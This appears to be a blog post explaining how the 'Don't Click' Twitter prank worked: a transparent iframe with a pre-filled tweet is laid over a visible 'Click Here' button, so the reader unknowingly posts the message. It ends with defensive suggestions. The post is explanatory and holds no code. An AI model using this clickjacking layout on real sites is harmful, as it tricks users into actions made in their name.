How The “Don’t Click” Twitter Hack Works

I began to see "Don’t Click" posts appearing in my Twhirl client from a few different users. Then came the warnings not to click the links in those tweets as that would tweet a "Don’t Click" from my own account. Being curious (and careful), I decided to figure out how this could work. First, I would like to recommend that you don’t follow my steps unless you know what you’re doing. This instance is relatively benign (annoying, but benign) the next instance could result in virus/trojan infestation.

After finding one of the "Don’t Click" links, I disabled JavaScript within Firefox. I was reasonably confident that this would prevent anything from running automatically. Next, I opened the link. Sure enough, a page opened up with a "Click Here" button. Next, I examined the source code but didn’t see anything that would automatically post the tweet. It did notice an iFrame loading with a premade Tweet just as thinkgeek mentioned.  I didn’t see how it would post the message to your tweet-stream, however.

At the bottom of the page was a credit for the source of the code so (keeping JavaScript disabled), I decided to follow the link.  That turned out to be a blog post written in French.  A quick trip to Babelfish later, and I was able to read the blog post.  The translation wasn’t perfect, but it was good enough.  So here’s how it goes:

  1. You see "Don’t Click" posted by one of your Twitter Friends.  Being the curious sort, you click on the link.
  2. The page that loads contains an iFrame.  This iFrame loads up with another "Don’t Click" message pre-filled out.  So far, this isn’t a threat of any kind.  Websites can do this all they want, they just can’t interact with the contents of the iFrame (beyond loading up completely new contents).  The website doesn’t have access to your Twitter Username or Password.
  3. The iFrame is set via CSS to be transparent.  This means that it’s there and clickable, but you don’t actually see it.
  4. A "Click Here" button is shown and positioned (via CSS) right where the page’s submit button is.
  5. You, again being the curious sort, try to click the "Click Here" button.
  6. Instead of clicking "Click Here", your browser clicks on the Twitter Submit button (located on top of the Click Here button but invisible to you).
  7. Twitter posts a "Don’t Click" message in your name.

It is quite clever, but it still requires two user actions.  First, you need to click on the "Don’t Click" link.  Next, you need to click on the "Click Here" button.  This whole hack wouldn’t work if didn’t support pre-filling out messages, but those pre-filled out messages can come in handy from time to time.  So what can Twitter do to prevent this?  To be honest, I don’t know.  They’ve said that they’re working on it, but (short of removing the "pre-filled message" functionality), this prank uses standard HTML/CSS conventions.  For now, though, the easiest way to prevent this is not to click on those links or, if you do, don’t click on the second link.

Update:  I actually did just think of something Twitter could do to stop this.  The Don’t Click pranksters can’t see what’s going on when they attempt to get their tweet sent under their victim’s name.  Twitter, however, can detect that a pre-filled out message is about to be sent and can pop-up a JavaScript prompt confirming the submission.  The pranksters won’t be able to click on the "Ok, submit this" button in a JavaScript prompt and the potential victim will (hopefully) cancel the message and leave.